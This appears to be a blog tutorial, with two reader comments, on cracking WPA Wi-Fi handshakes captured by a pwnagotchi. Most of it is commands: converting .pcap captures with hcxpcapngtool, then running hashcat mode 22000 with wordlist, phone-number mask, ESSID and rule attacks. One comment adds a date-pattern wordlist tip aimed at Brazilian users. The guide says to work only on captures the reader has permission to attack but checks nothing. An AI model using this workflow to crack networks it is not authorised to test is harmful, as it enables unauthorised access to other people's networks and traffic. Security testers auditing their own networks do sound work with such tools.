Once you've collected enough crackable WPA material with your pwnagotchi, it's time to attack it with hashcat.
Pwnagotchi stores the handshakes as .pcap files, while modern versions of hashcat use hash mode 22000. No problem, it's easy to convert between the two. On Kali or Ubuntu or Mint, install the hcxtools as follows:
sudo apt-get install hcxtools
Now, in the directory with all the .pcap files you have permission to attack, run the following command:
hcxpcapngtool *.pcap -o candidates.hc22000 -E essid.wordlist
This converts all the .pcap files into a single output file, candidates.hc22000. We also extract the list of essids (network name), as these might be useful in your cracking attempt.
Now we need hashcat. If you are running Kali, hashcat is probably already installed. If not, or if you are running Ubuntu or Mint, you can install it with the following command:
sudo apt-get install hashcat hashcat-data
# If you have an nvidia graphics card:
sudo apt-get install hashcat-nvidia
# Check if the install worked, run a benchmark
hashcat -m 22000 --benchmark
Right. Let's attack the handshakes.
hashcat -m 22000 candidates.hc22000 /usr/share/doc/hashcat-data/examples/example.dict
This tells hashcat to run in hash mode 22000, for cracking the WPA pre-shared key. We attack candidates.hc22000 and we use the example wordlist in /usr/share/doc/hashcat-data/examples/example.dict.
You can see if hashcat was successful with the following command:
hashcat -m 22000 candidates.hc22000 --show
No successes? Don't worry, here are some other attacks to try:
# Try all telephone numbers in your area code:
hashcat -m 22000 candidates.hc22000 -a 3 780?d?d?d?d?d?d?d
# Try the essids:
hashcat -m 22000 candidates.hc22000 essid.wordlist
# Permutate the example wordlist and the essids with a ruleset
hashcat -m 22000 candidates.hc22000 /usr/share/doc/hashcat-data/examples/example.dict essid.wordlist -r /usr/share/hashcat/rules/best64.rule
If that was not successful, you may want to try other wordlists. In Kali, there are a few in /usr/share/wordlists. Alternatively, there are plenty available online. A good list to start with is the rockyou wordlist, though it is rather large.
Remember, hashcat runs much faster if you throw a GPU (or three) at it. A modern nVidia Geforce RTX 4090 may crack 2500 kH/sec. A 3080 might get 900 kH/sec. Running just on the CPU without any GPU may only net you 25 kH/sec, though. That's fine for quick checks and small wordlists but much too slow for anything more significant.
What's next? Hashcat is a powerful tool, allowing significant control over the attacks. The hashcat wiki has lots of helpful information.
Happy cracking!
Top comments (2)
Thanks for the phone tip.
In fact, the most effective dict I've created was using DATES. As I am in Brazil, the format DDMMYYYY can crack a lot of hashes here, because many people use birth, wedding and so on.
If someone here want I can provide the shell script to generate a text file with all possible dates since the desired date to today.
Thanks for guide 😌. It works good.